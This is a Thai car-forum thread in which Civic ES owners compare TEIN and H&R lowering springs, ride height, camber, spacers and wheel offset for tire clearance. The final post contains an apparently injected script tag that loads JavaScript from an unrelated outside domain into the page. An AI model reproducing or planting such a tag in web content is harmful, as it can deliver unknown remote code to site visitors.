ให้คำขอบคุณ: 718

ที่อยู่: นิคมขุนทะเล อ.เมือง สฎ
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 08:16 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
...
HankMan


เข้าร่วม: 10 มกรา 2011
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 359
ให้คำขอบคุณ: 749

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 08:25 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ผมใช้ h&r อยู่คับ หน้าลงเหลือ 2 นิ้วสอด แต่ท้ายห้อยเหลือ 1 นิ้วสอด แล้วล้อแบะมาก เพราะผมไม่ได้ camber แบบปรับได้ ก้อเลยเลือกใส่สเปเซอร์ รองหลังขึ้น 1 นิ้ว ล้อเลยไม่แบะมาก แต่ถ้าหา camber ได้ ผมกะว่าจะถอดสเปเซอ ออกเลยคับ
ได้รับคำขอบคุณจาก: yoyosonic 
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 16 มกรา 2013 08:59 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
HankMan พิมพ์ว่า:
ผมใช้ h&r อยู่คับ หน้าลงเหลือ 2 นิ้วสอด แต่ท้ายห้อยเหลือ 1 นิ้วสอด แล้วล้อแบะมาก เพราะผมไม่ได้ camber แบบปรับได้ ก้อเลยเลือกใส่สเปเซอร์ รองหลังขึ้น 1 นิ้ว ล้อเลยไม่แบะมาก แต่ถ้าหา camber ได้ ผมกะว่าจะถอดสเปเซอ ออกเลยคับ



ลองวิ่งไปติวนนท์การยางดูครับน่าจะมี
EiKung


ชื่อเล่น: อิคุง

เข้าร่วม: 08 กันยา 2012
ตอบ: 242

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 301

ที่อยู่: นนทบุรี
ปี: 2005
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พุธ, 16 มกรา 2013 09:05 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:
มาแล้ว

รูปบน หน้า Tein หลังเดิม น้ำมัน 1/3 แก๊ส 1/2 ถังโดนัท 43L

รูปล่าง หน้า H&R หลังเดิม น้ำมัน 1/3 แก๊ส เต็ม ถังโดนัท 43L




ขอสอบถาม หน้า H&R หลังเดิม
1. เด้งมากไหมเวลาขับบนถนน หรือ เวลาตกหลุม
2. เวลาเข้าโค้งแรงๆ มีอาการอย่างไรบ้างครับ
3. เวลาขึ้นลูกระนาดติดไหมครับ

ปล.ได้เลื่อนเบ้าหน้าลงไหมไหมครับ และ หลังได้เลื่อนหรือป่าว
ได้รับคำขอบคุณจาก: raksapol 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 10:56 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
EiKung พิมพ์ว่า:
athongchum พิมพ์ว่า:
มาแล้ว

รูปบน หน้า Tein หลังเดิม น้ำมัน 1/3 แก๊ส 1/2 ถังโดนัท 43L

รูปล่าง หน้า H&R หลังเดิม น้ำมัน 1/3 แก๊ส เต็ม ถังโดนัท 43L




ขอสอบถาม หน้า H&R หลังเดิม
1. เด้งมากไหมเวลาขับบนถนน หรือ เวลาตกหลุม
2. เวลาเข้าโค้งแรงๆ มีอาการอย่างไรบ้างครับ
3. เวลาขึ้นลูกระนาดติดไหมครับ

ปล.ได้เลื่อนเบ้าหน้าลงไหมไหมครับ และ หลังได้เลื่อนหรือป่าว




ตอบ หน้า H&R หลังเดิม
1.เด้งครับแต่ไม่มาก เหมือนกับโช๊คเดิมนั่นแหละ แต่ของผมอัดน้ำมันเพิ่มมาแล้วตอนใส่ Eibach ตอนนี้ใส่หลังเดิมก็เด้งน้อยกว่าโช๊คเดิมสปริงเดิมครับ
2.ผมไม่เคยใส่สปริงเดิม ขอเปรียบเทียบกับที่เคยใส่มาน่ะครับ เทียบกับ Tein ผมว่าทำได้ดีกว่าครับแต่ก็ไม่มากไม่ต่างกันเท่าไหร่ มีอาการย้วยให้เห็น เทียบกับ Eibach สู้ไม่ได้ครับ Eibach หนึบกว่ามาก แต่ Eibach ก็กระด้างมากกว่าเช่นกัน
3.ลูกระนาดขนาดปกติทั่วไป ไม่ติดครับ ยกเว้นลูกระนาดบ้าพลัง ไม่รอดครับ แต่เวลาเข้าจอดช่องจอดที่มีแท่งปูนกั้นล้อต้องถอยหลังเข้า ถ้าเอาหน้าเข้ามันจะเกี่ยวกับแผ่นกันโคลนห้องเครื่อง เพราะพอตูดโด่งหน้าจะกดต่ำกว่าปกติ

ปล.ไม่ได้เลื่อนเบ้าทั้งหน้าและหลัง
blendz


ชื่อเล่น: เบนล์

เข้าร่วม: 08 พฤศจิกา 2012
ตอบ: 338

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 823
ให้คำขอบคุณ: 89

ที่อยู่: ดอนเมือง
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 20:22 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ขออนุญาติ จขกท.นะครับ ถามต่อนิดครับ
แล้วถ้าเป็นขอบ 17 ยาง 215/45 ละครับ จะติดซุ้มหรือป่าวครับ ควรเปลี่ยนของยี่ห้ออะไรถึงจะเหมาะครับ
มีโครงการว่าจะเปลี่ยนสปริงเหมือกันครับ ตอนนี้เเม๊กเดิมยางเดิม รถติดแก๊สด้วยครับ
กลัวทำมาแล้วเวลาผู้โดยสารเต็มคันเดียวติดซุ้ม โดนบ่นอีก..(โดนบ่นในรถเนี่ย ทรมานที่สุดเลยผมว่า มันหนีไปไหนไม่ได้)
  ...วอนผู้รู้ตอบให้กระจ่างด้วยครับ..
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 21:13 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
blendz พิมพ์ว่า:
ขออนุญาติ จขกท.นะครับ ถามต่อนิดครับ
แล้วถ้าเป็นขอบ 17 ยาง 215/45 ละครับ จะติดซุ้มหรือป่าวครับ ควรเปลี่ยนของยี่ห้ออะไรถึงจะเหมาะครับ
มีโครงการว่าจะเปลี่ยนสปริงเหมือกันครับ ตอนนี้เเม๊กเดิมยางเดิม รถติดแก๊สด้วยครับ
กลัวทำมาแล้วเวลาผู้โดยสารเต็มคันเดียวติดซุ้ม โดนบ่นอีก..(โดนบ่นในรถเนี่ย ทรมานที่สุดเลยผมว่า มันหนีไปไหนไม่ได้)
  ...วอนผู้รู้ตอบให้กระจ่างด้วยครับ..




ใส่ได้ทุกยี่ห้อครับ ติดไม่ติดขึ้นอยู่กับ offset ล้อครับ 38-42 ไม่ติดแน่นอนครับ
blendz


ชื่อเล่น: เบนล์

เข้าร่วม: 08 พฤศจิกา 2012
ตอบ: 338

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 823
ให้คำขอบคุณ: 89

ที่อยู่: ดอนเมือง
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 22:15 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:

blendz พิมพ์ว่า:
ขออนุญาติ จขกท.นะครับ ถามต่อนิดครับ
แล้วถ้าเป็นขอบ 17 ยาง 215/45 ละครับ จะติดซุ้มหรือป่าวครับ ควรเปลี่ยนของยี่ห้ออะไรถึงจะเหมาะครับ
มีโครงการว่าจะเปลี่ยนสปริงเหมือกันครับ ตอนนี้เเม๊กเดิมยางเดิม รถติดแก๊สด้วยครับ
กลัวทำมาแล้วเวลาผู้โดยสารเต็มคันเดียวติดซุ้ม โดนบ่นอีก..(โดนบ่นในรถเนี่ย ทรมานที่สุดเลยผมว่า มันหนีไปไหนไม่ได้)
  ...วอนผู้รู้ตอบให้กระจ่างด้วยครับ..




ใส่ได้ทุกยี่ห้อครับ ติดไม่ติดขึ้นอยู่กับ offset ล้อครับ 38-42 ไม่ติดแน่นอนครับ


ออ..ครับผมตอนแรกว่าจะคบ ไอบัค  งั้นเป็น H&R ท่าจะดีกว่า ชอบเตี้ยๆหน่อย รึมีเตี้ยกว่ากว่านี้อีกไหมครับ ขอบคุณครับ
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 16 มกรา 2013 22:43 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ถ้าเปงของผมล่ะครับ 195/50 r 15 กว้าง 8 ออฟ 28 ครับ มันจะติดซุ้มไม่ครับ
jat_es03


เข้าร่วม: 11 ธันวา 2013
ตอบ: 369

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 134
ให้คำขอบคุณ: 65

ที่อยู่: จ.กาญจนบุรี
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 2 มกรา 2014 18:35 - โช๊คเดิม+สปริงโหลดh&rหรือสปริงโหลดtein
โช๊คเดิมเลื่อนเบา+สปริงโหลดh&rหรือสปริงโหลดtein ใส่แล้วท้ายจะเตี้ยเยอะไหมคับ ขอคำแนะนำด้วยคับ ชอบแบบหน้าเตี้ย+ท้ายโด่ง "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: karnmotocross01 
ตอบ
หน้า 2 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.